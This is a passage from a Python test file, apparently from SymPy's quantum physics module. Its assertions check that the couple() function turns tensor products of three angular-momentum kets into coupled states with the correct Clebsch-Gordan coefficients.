((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)))
== sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)))
== -2
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half)))
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(2)
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ 2
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)))
== sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1)))
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
Rational(3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)))
== -sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half)))
/ 3
- JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 3
- 2
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1)))
== -2
* JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1)))
== sqrt(2)
* JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half)))
/ 3
+ JzKetCoupled(
S.Half, S.Half, (S.Half, 1, 1), ((1, 2, Rational(3, 2)), (1, 3, S.Half))
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
S(5) / 2,
S.Half,
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(
S.Half, Rational(-1, 2), (S.Half, 1, 1), ((1, 2, S.Half), (1, 3, S.Half))
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1)))
== -sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1)))
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, -1))
) == JzKetCoupled(
S(5) / 2,
Rational(-5, 2),
(S.Half, 1, 1),
((1, 2, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
# j1=1, j2=1, j3=1
assert couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 1))) == JzKetCoupled(
3, 3, (1, 1, 1), ((1, 2, 2), (1, 3, 3))
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)))
== sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)))
== sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 5
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)))
== sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
+ JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)))
== -sqrt(2) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(6) * JzKetCoupled(2, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, 2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)))
== -JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
+ JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)))
== -sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)))
== -sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- 2 * sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 5
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)))
== -sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
- JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)))
== -JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
+ JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)))
== sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)))
== sqrt(3) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
+ JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
- JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, 1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)))
== sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ sqrt(3) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 15
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 3
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)))
== sqrt(3) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 0), (1, 3, 1))) / 3
- JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 30
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)))
== -sqrt(6) * JzKetCoupled(0, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 0))) / 6
+ JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
+ sqrt(15) * JzKetCoupled(1, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- sqrt(3) * JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 6
- JzKetCoupled(2, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 2
+ sqrt(10) * JzKetCoupled(3, 0, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 10
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)))
== JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 1))) / 2
- sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 10
- JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ 2 * sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)))
== -sqrt(2) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 1), (1, 3, 2))) / 2
+ sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 6
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)))
== sqrt(15) * JzKetCoupled(1, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 1))) / 5
- sqrt(3) * JzKetCoupled(2, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(15) * JzKetCoupled(3, -1, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 15
)
assert (
couple(TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)))
== -sqrt(6) * JzKetCoupled(2, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 2))) / 3
+ sqrt(3) * JzKetCoupled(3, -2, (1, 1, 1), ((1, 2, 2), (1, 3, 3))) / 3
)
assert couple(
TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, -1))
) == JzKetCoupled(3, -3, (1, 1, 1), ((1, 2, 2), (1, 3, 3)))
# j1=S.Half, j2=S.Half, j3=Rational(3, 2)
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(3, 2)),
)
) == JzKetCoupled(
Rational(5, 2),
S(5) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), S.Half),
)
)
== sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(15)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ 2
* sqrt(30)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(Rational(3, 2), Rational(-3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
-S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(3, 2)),
)
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, S(3) / 2),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), S.Half),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 0), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(30)
* JzKetCoupled(
Rational(5, 2),
S(1) / 2,
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(Rational(3, 2), Rational(-1, 2)),
)
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, Rational(3, 2)),
((1, 2, 1), (1, 3, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
